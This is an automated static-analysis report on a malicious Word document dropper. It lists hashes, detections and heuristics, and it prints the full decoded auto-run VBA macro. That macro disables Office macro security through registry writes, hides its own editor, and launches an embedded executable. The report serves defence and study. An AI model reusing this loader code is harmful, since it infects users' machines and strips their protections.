Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2667a453466dc39b…

MALICIOUS

Office (OLE)

164.5 KB Created: 2003-08-07 12:42:00 Authoring application: Microsoft Word 9.0 First seen: 2016-07-20
MD5: 33c809a9479bb1f13a45ffd73e477da6 SHA-1: 79fb5c04e674e1ee52e782f4362f87231658decc SHA-256: 2667a453466dc39b1a51b91e3d8b65094ff5a40ac990191d8d433677d6b424b5
508 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Office document containing an obfuscated VBA macro that executes an embedded PE executable. The macro uses CreateObject and references LoadLibrary and GetProcAddress APIs, indicating it is designed to load and run the embedded payload. The embedded executable, 'embedded_office_0000665b.exe', is the primary malicious component.

Heuristics 12

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Dropper.Agent-1494922 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1494922
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    End If
Set w = CreateObject(u("PTdunws)Tobkk"))
Set f = CreateObject(u("Tdunwsni`)AnkbT~tsbjHembds"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    End If
Set w = CreateObject(u("PTdunws)Tobkk"))
Set f = CreateObject(u("Tdunwsni`)AnkbT~tsbjHembds"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Dim w As Object, f As Object
Private Sub Document_Open()
On Error Resume Next
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2852 bytes
SHA-256: ab4d31d43ab37d8b7865fb0195c9ea05c96efe354d300b49f2483fa435931760
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "gedzac"
Attribute VB_Base = "1Normal.GEDZAC"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim w As Object, f As Object
Private Sub Document_Open()
On Error Resume Next
ScreenUpdating = u("Afktb"): DisplayAlerts = u("Afktb"): Options.ConfirmConversions = u("Afktb")
Options.SaveNormalPrompt = u("Afktb"): EnableCancelKey = 0: ShowVisualBasicEditor = u("Afktb")
CommandBars(u("Qntrfk'Eftnd")).Enabled = u("Afktb"): CommandBars(u("Shhkt")).Controls(u("Jfduh")).Enabled = u("Afktb")
If Int(Application.Version) > 8 Then
w.RegWrite u("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Haandb[67)7[Phuc[Tbdruns~[Kbqbk"), 1, "REG_DWORD"
w.RegWrite u("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Haandb[67)7[Phuc[Tbdruns~[FddbttQEHJ"), 1, "REG_DWORD"
w.RegWrite u("OLB^XRTBUT[)CBAFRKS[Thaspfub[Jnduhthas[Haandb[67)7[Phuc[Tbdruns~[Kbqbk"), 1, "REG_DWORD"
w.RegWrite u("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Haandb[>)7[Phuc[Tbdruns~[Kbqbk"), 1, "REG_DWORD"
w.RegWrite u("OLB^XRTBUT[)CBAFRKS[Thaspfub[Jnduhthas[Haandb[>)7[Phuc[Tbdruns~[Kbqbk"), 1, "REG_DWORD"
CommandBars(u("Qnbp")).Controls(5).Enabled = u("Afktb"): CommandBars(u("Shhkt")).Controls(17).Enabled = u("Afktb")
CommandBars(u("Shhkt")).Controls(18).Enabled = u("Afktb"): CommandBars(u("Shhkt")).Controls(19).Enabled = u("Afktb")
ElseIf Int(Application.Version) < 9 Then
CommandBars(u("Shhkt")).Controls(14).Enabled = u("Afktb"): CommandBars(u("Shhkt")).Controls(15).Enabled = u("Afktb")
CommandBars(u("Shhkt")).Controls(16).Enabled = u("Afktb"): CommandBars(u("Qnbp")).Controls(6).Enabled = u("Afktb")
End If
Set w = CreateObject(u("PTdunws)Tobkk"))
Set f = CreateObject(u("Tdunwsni`)AnkbT~tsbjHembds"))
If Not (IsBKey()) Then
ActiveDocument.Shapes(1).Visible = True
SVir = ActiveDocument.Shapes(1).OLEFormat.ClassType
With ActiveDocument.Shapes(1).OLEFormat
    .ActivateAs ClassType:=SVir
    .Activate
End With
Else
ActiveDocument.Shapes(1).Visible = False
End If
If LCase(NormalTemplate.VBProject.VBComponents.Item(1).Name) <> "gedzac" Then
Key8 = BuildKeyCode(wdKeyAlt, wdKeyF8): Key11 = BuildKeyCode(wdKeyAlt, wdKeyF11): Ktip = wdKeyCategoryCommand
KeyBindings.Add Ktip, "Keyh", Key8
KeyBindings.Add Ktip, "Keyh", Key11
End If
End Sub
Private Function u(s)
On Error Resume Next
For i = 1 To Len(s)
u = u & Chr(Asc(Mid(s, i, 1)) Xor 7)
Next
End Function
Sub Keyh()
On Error Resume Next: MsgBox u("Ihs'Qfknc'dhjwhibis"), 16, u("Buuhu")
End Sub
Private Function IsBKey()
On Error Resume Next
bKey2 = u(w.RegRead(u("OLB^XKHDFKXJFDONIB[Thaspfub[@BC]FD'KFET[P45)Efucnbk[ELb~5")))
If f.FileExists(f.GetSpecialFolder(1) & "\" & bKey2) Then IsBKey = True Else IsBKey = False
End Function
embedded_office_0000665b.exe embedded-pe Office MZ+PE at offset 0x665B 142245 bytes
SHA-256: 6f2b7c0672050d90d544192795921bd8a52e50dad1a217b76fbe0b1b59ec32a5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1128694766/Ole10Native 111756 bytes
SHA-256: 8baa582bf64b8aee6edddaf41c63d8e5f9f388800204da127efb488003048d54
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.72, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.